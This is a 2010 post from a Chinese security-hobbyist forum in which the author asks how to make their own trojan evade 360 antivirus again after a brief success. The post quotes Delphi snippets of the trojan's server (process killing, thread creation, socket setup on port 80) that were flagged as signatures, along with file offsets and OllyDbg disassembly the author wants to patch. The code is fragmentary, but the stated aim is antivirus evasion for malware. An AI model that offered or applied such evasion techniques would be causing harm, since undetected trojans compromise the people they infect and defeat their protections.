【3.A.S.T】网络安全爱好者 - Powered by Discuz! Board

标题: 昨天把木马源码免杀过360,今天又被它通缉了...望免杀的大牛们指教! [打印本页]

作者: Winmillion 时间: 2010-8-12 00:37 标题: 昨天把木马源码免杀过360,今天又被它通缉了...望免杀的大牛们指教!

昨天定位特征码对应的源码:
If Proce(StrToInt(PID))=(ConSa.sCopyTo+ConSa.sFileNameToCopy) Then //PID被定为特征码
TerminateProce(hProce,0); //TerminateProce被定为特征码
CrearThread; //CrearThread自定过过程被定为特征码

今天定位特征码对应的源码:
ConSa.sPort:='80'; //sport被定为特征码
ClientSocket:=TClientSocket.Create(Nil); //Create被定为特征码
ClientSocket.OnRead:=MainApplication.ClientSocketRead; //Read被定为特征码

(我的Server是无窗体,没调用VCL控件,直接引用TClientSocket)

物理地址             虚拟偏移地址
000445C7_00000C05    004475C7
00044A3B_0000001E    00447A3B
00044A3B_00000020

OD载入:
004475C7 /71 19          jno short 1.004475E2

00447A3B 6300             arpl word ptr ds:[eax],ax

这次被定位到Server的核心代码,源码无法修改了,想用OD修改,望免杀的大牛们指教!

欢迎光临【3.A.S.T】网络安全爱好者 (http://3ast.com/)